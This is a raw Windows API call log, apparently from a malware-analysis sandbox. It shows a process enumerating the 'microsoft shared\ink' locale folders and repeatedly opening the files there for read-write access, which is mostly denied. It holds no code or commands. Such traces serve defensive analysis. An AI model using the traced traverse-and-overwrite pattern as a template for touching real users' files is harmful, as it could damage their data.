Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0098.549] AreFileApisANSI () returned 1 [0098.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA", lpUsedDefaultChar=0x0) returned 57 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0098.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.550] AreFileApisANSI () returned 1 [0098.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0098.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 57 [0098.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.550] GetLastError () returned 0x5 [0098.550] GetLastError () returned 0x5 [0098.550] SetLastError (dwErrCode=0x5) [0098.550] GetLastError () returned 0x5 [0098.550] SetLastError (dwErrCode=0x5) [0098.550] GetLastError () returned 0x5 [0098.550] SetLastError (dwErrCode=0x5) [0098.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0098.550] AreFileApisANSI () returned 1 [0098.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0098.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 57 [0098.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.551] GetLastError () returned 0x5 [0098.551] GetLastError () returned 0x5 [0098.551] SetLastError (dwErrCode=0x5) [0098.551] GetLastError () returned 0x5 [0098.551] SetLastError (dwErrCode=0x5) [0098.551] GetLastError () returned 0x5 [0098.551] SetLastError (dwErrCode=0x5) [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0098.551] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0098.551] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0098.551] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.551] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0098.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0098.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.552] AreFileApisANSI () returned 1 [0098.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0098.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.553] AreFileApisANSI () returned 1 [0098.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0098.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 73 [0098.553] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.553] GetFileType (hFile=0x368) returned 0x1 [0098.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0098.553] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.554] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.554] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.554] CloseHandle (hObject=0x368) returned 1 [0098.554] AreFileApisANSI () returned 1 [0098.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85e40 [0098.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 73 [0098.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.554] GetLastError () returned 0x5 [0098.554] GetLastError () returned 0x5 [0098.554] SetLastError (dwErrCode=0x5) [0098.554] GetLastError () returned 0x5 [0098.554] SetLastError (dwErrCode=0x5) [0098.554] GetLastError () returned 0x5 [0098.555] SetLastError (dwErrCode=0x5) [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0098.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.555] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8cd90, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0098.555] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0098.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0098.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.556] AreFileApisANSI () returned 1 [0098.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG", lpUsedDefaultChar=0x0) returned 57 [0098.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0098.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.556] AreFileApisANSI () returned 1 [0098.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0098.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 57 [0098.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.556] GetLastError () returned 0x5 [0098.556] GetLastError () returned 0x5 [0098.556] SetLastError (dwErrCode=0x5) [0098.556] GetLastError () returned 0x5 [0098.556] SetLastError (dwErrCode=0x5) [0098.556] GetLastError () returned 0x5 [0098.557] SetLastError (dwErrCode=0x5) [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.557] AreFileApisANSI () returned 1 [0098.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0098.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 57 [0098.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.557] GetLastError () returned 0x5 [0098.557] GetLastError () returned 0x5 [0098.557] SetLastError (dwErrCode=0x5) [0098.557] GetLastError () returned 0x5 [0098.557] SetLastError (dwErrCode=0x5) [0098.557] GetLastError () returned 0x5 [0098.557] SetLastError (dwErrCode=0x5) [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0098.557] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) 